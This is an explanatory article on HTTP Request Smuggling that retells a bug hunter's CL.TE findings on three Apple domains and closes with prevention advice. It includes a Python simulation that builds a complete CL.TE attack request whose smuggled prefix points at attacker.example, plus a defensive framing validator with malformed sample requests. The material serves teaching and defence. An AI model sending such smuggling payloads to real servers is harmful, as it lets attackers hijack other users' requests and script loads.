What is HTTP Request Smuggling?
HTTP Request Smuggling (HRS) is an attack that exploits a disagreement between a front-end server (a load balancer, reverse proxy or CDN) and the back-end server behind it about where one HTTP request ends and the next begins on a shared connection. Bytes that the front-end treats as the tail of one request are read by the back-end as the start of a new one, so the attacker can prepend their own data to the next user's request. This lets an attacker bypass front-end security controls, poison other users' requests and responses, and reach sensitive information or functionality. Preventing HRS means making sure the front-end and back-end frame requests identically, or better, rejecting any request whose framing is ambiguous; web application firewalls can help by refusing such requests before they reach the application.
The Story
A young bug hunter called WhoAmI discovered several critical HTTP Request Smuggling issues affecting three of Apple's websites. The hunter has been in the bug bounty scene since 2018 and specializes in web application vulnerabilities. He decided to take a closer look at Apple's systems after Apple's bug bounty program gained prominence. He found the request smuggling issues on three domains: business.apple.com, school.apple.com, and mapsconnect.apple.com.
The hunter used the same technique against each server. All three were vulnerable to an HTTP desync attack, known as HTTP Request Smuggling, in its CL.TE form.
The vulnerability arose because the front-end server determined the length of each request from the Content-Length header, while the back-end server honoured the Transfer-Encoding: chunked header instead, so the two disagreed about where the request body ended.
Stored XSS
The hunter was also able to slip a malicious header past the front-end server by placing a newline character and a space in the header name. Shortly afterwards he began receiving requests from live production users, which allowed him to redirect their JavaScript imports and obtain stored XSS on the host.
The exploit let the attacker redirect live users to a server under the attacker's control: a victim's request for a JavaScript file would land on a poisoned socket, where the smuggled prefix turned it into a redirect to a JavaScript file on the attacker's server. The victim's browser followed the redirect and loaded and executed that file.
This is what made stored cross-site scripting (XSS) possible. The servers were also vulnerable to response queue poisoning: by smuggling a complete request, the hunter could desynchronise the response queue so that users received responses intended for other users, leading to data disclosure and account takeover.
Other vectors were usable as well, such as bypassing access control rules on a directory.
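To make the CL.TE mismatch and the poisoned-socket redirect concrete, here is an added Python model; it is not code from the write-up or from Apple's systems. Two toy parsers frame the same bytes the way a front-end that trusts Content-Length and a back-end that trusts Transfer-Encoding: chunked would, and the back-end's leftover bytes are then prepended to a victim's request for a script. The attacker request, the victim request, the hostnames target.example and attacker.example, and the assumption that the back-end uses the first Host header it sees are all constructed for this example.

```python
"""
CL.TE desync, modelled as an added example (not code from the write-up).
Two toy parsers frame the same byte stream the way a front-end that trusts
Content-Length and a back-end that trusts Transfer-Encoding: chunked would.
The attacker request, victim request and hostnames are constructed here.
"""


def split_head(raw: bytes):
    """Return (request line, header dict, offset where the body starts)."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        # First occurrence wins (an assumption about the back-end): this is
        # why the duplicated Host in the poisoned request resolves to the
        # attacker's value.
        headers.setdefault(name.strip().lower(), value.strip())
    return lines[0], headers, len(head) + 4


def frame_by_content_length(buf: bytes):
    """Front-end view: the request ends after Content-Length body bytes."""
    _, headers, body_start = split_head(buf)
    end = body_start + int(headers.get(b"content-length", b"0"))
    return buf[:end], buf[end:]


def frame_by_chunked(buf: bytes):
    """Back-end view: the request ends after the zero-length chunk."""
    _, _, pos = split_head(buf)
    while True:
        size_end = buf.index(b"\r\n", pos)
        size = int(buf[pos:size_end], 16)
        pos = size_end + 2
        if size == 0:
            pos += 2          # CRLF that terminates the chunked body
            return buf[:pos], buf[pos:]
        pos += size + 2       # chunk data plus its trailing CRLF


# Smuggled prefix: no trailing CRLF, so the victim's request line is
# swallowed into the "Foo" header and the attacker's Host wins.
SMUGGLED = (b"GET /home HTTP/1.1\r\n"
            b"Host: attacker.example\r\n"
            b"Foo: X")

BODY = b"0\r\n\r\n" + SMUGGLED
ATTACKER_REQUEST = (b"POST / HTTP/1.1\r\n"
                    b"Host: target.example\r\n"
                    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
                    b"Transfer-Encoding: chunked\r\n"
                    b"\r\n" + BODY)

# Constructed request from an unrelated user, fetching a script.
VICTIM_REQUEST = (b"GET /scripts/app.js HTTP/1.1\r\n"
                  b"Host: target.example\r\n"
                  b"\r\n")


def simulate(attacker: bytes, victim: bytes) -> dict:
    """Run both framings and show what the back-end sees as the victim's request."""
    _, fe_rest = frame_by_content_length(attacker)
    _, be_rest = frame_by_chunked(attacker)
    # The back-end's leftover bytes stay on the shared connection and are
    # prepended to whatever the front-end forwards next.
    poisoned = be_rest + victim
    req_line, headers, _ = split_head(poisoned)
    return {
        "frontend_leftover": fe_rest,
        "backend_leftover": be_rest,
        "poisoned_request_line": req_line,
        "poisoned_host": headers.get(b"host"),
        "foo_header": headers.get(b"foo"),
    }


if __name__ == "__main__":
    for key, val in simulate(ATTACKER_REQUEST, VICTIM_REQUEST).items():
        print(f"{key}: {val!r}")
```

The front-end forwards the whole attacker request as one unit and keeps nothing, while the back-end stops at the zero-length chunk and leaves the smuggled prefix on the connection. The victim's request for /scripts/app.js is then parsed as `GET /home` with `Host: attacker.example`, which is exactly the shape that lets a Host-based redirect send the victim's browser to the attacker's JavaScript. Response queue poisoning, also mentioned above, needs a complete smuggled request rather than a prefix and is not modelled here.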
Apple quickly responded and remediated the issues, awarding a $12,000 bounty for each domain, $36,000 in total.
The hunter plans to continue sharing interesting bugs and research in the future through bug bounty write-ups.
This report is a reminder for organizations to continuously test the security of their web applications, and for developers to prioritize fixing the vulnerabilities that are found.
How to Prevent HTTP Request Smuggling?
To prevent HRS, you can take the following steps:
- Validate request framing strictly: reject requests that carry both Content-Length and Transfer-Encoding headers, that contain duplicate or non-numeric Content-Length values, or that use malformed or obfuscated header syntax (whitespace or control characters in header names, line folding, unusual Transfer-Encoding values), rather than trying to interpret them.
- Configure front-end and back-end servers consistently: the front-end should normalize every request it forwards so that the back-end cannot read the request boundaries differently, and it should drop the back-end connection rather than reuse it after a request it could not parse cleanly.
- Use the latest HTTP protocol: HTTP/2 carries message length in binary frames, so using it end to end removes the Content-Length versus Transfer-Encoding ambiguity. A front-end that accepts HTTP/2 from clients but downgrades to HTTP/1.1 towards the back-end reintroduces the problem.
- Keep software up-to-date: web servers, proxies and load balancers have shipped fixes for known request-smuggling parsing bugs, and patching ensures those fixes are in place.
- Conduct regular security assessments: regularly assess your web application for vulnerabilities, including HRS, so that any weaknesses can be addressed before they can be exploited.
- Use a web application firewall (WAF): a WAF can detect and block HRS attempts by refusing ambiguously framed requests, bearing in mind that the WAF is itself an HTTP parser and must agree with the servers behind it.
By taking these steps, you can help protect your web application from HTTP Request Smuggling attacks and prevent unauthorized access or data theft.
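As an added example of what strict framing validation looks like in practice (this is not code from the write-up or from any particular proxy), the following Python check rejects the ambiguous requests a CL.TE desync relies on: both length headers together, duplicate or non-numeric Content-Length, non-"chunked" Transfer-Encoding values, line folding, and whitespace or control characters in header lines. The sample requests and the host name t.example are constructed for this example.

```python
"""
Request-framing check for a front-end proxy, written as an added example
(not from the write-up or from a specific product).  A request passes only
when there is exactly one unambiguous way to find the end of its body.
"""
import re

# RFC 7230 "tchar": the only bytes allowed in a header field name.  A name
# such as "Transfer-Encoding " (trailing space) fails this test.
TOKEN = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
# Any stray CR, LF or other control byte left inside a header line.
CONTROL = re.compile(rb"[\x00-\x1f\x7f]")


def check_framing(raw: bytes):
    """Return (ok, reason); ok is True only for unambiguously framed requests."""
    head, sep, _ = raw.partition(b"\r\n\r\n")
    if not sep:
        return False, "missing end of headers"
    content_lengths, transfer_encodings = [], []
    for line in head.split(b"\r\n")[1:]:
        if line[:1] in (b" ", b"\t"):
            return False, "obsolete line folding"
        if CONTROL.search(line):
            return False, "control character in header line"
        name, colon, value = line.partition(b":")
        if not colon or not TOKEN.match(name):
            return False, "malformed header name"
        name = name.lower()
        value = value.strip(b" \t")
        if name == b"content-length":
            content_lengths.append(value)
        elif name == b"transfer-encoding":
            transfer_encodings.append(value)
    if content_lengths and transfer_encodings:
        return False, "both Content-Length and Transfer-Encoding present"
    if len(content_lengths) > 1:
        return False, "duplicate Content-Length"
    if content_lengths and not content_lengths[0].isdigit():
        return False, "non-numeric Content-Length"
    for value in transfer_encodings:
        if value.lower() != b"chunked":
            return False, "unsupported Transfer-Encoding"
    return True, "ok"


# Constructed sample requests; only the two "clean_" ones should pass.
SAMPLES = {
    "clean_cl":      b"POST / HTTP/1.1\r\nHost: t.example\r\nContent-Length: 2\r\n\r\nhi",
    "clean_te":      b"POST / HTTP/1.1\r\nHost: t.example\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "cl_te":         b"POST / HTTP/1.1\r\nHost: t.example\r\nContent-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "space_in_name": b"POST / HTTP/1.1\r\nHost: t.example\r\nTransfer-Encoding : chunked\r\n\r\n0\r\n\r\n",
    "folded_te":     b"POST / HTTP/1.1\r\nHost: t.example\r\nTransfer-Encoding:\r\n chunked\r\n\r\n0\r\n\r\n",
    "bare_lf":       b"POST / HTTP/1.1\r\nHost: t.example\r\nFoo: x\nTransfer-Encoding: chunked\r\nContent-Length: 5\r\n\r\n0\r\n\r\n",
    "te_variant":    b"POST / HTTP/1.1\r\nHost: t.example\r\nTransfer-Encoding: xchunked\r\n\r\n0\r\n\r\n",
}


def audit(samples: dict) -> dict:
    """Map each sample name to the (ok, reason) verdict of check_framing."""
    return {name: check_framing(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, (ok, reason) in audit(SAMPLES).items():
        print(f"{name:14} {'PASS' if ok else 'REJECT'}  {reason}")
```

A front-end that applies a check like this before forwarding, and that closes the back-end connection instead of reusing it whenever the check fails, leaves no bytes for the back-end to misinterpret. Rejecting outright is deliberately stricter than RFC 7230's "Transfer-Encoding overrides Content-Length" rule, because the whole point is that the two servers may not implement that rule the same way.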
Link to write-up: here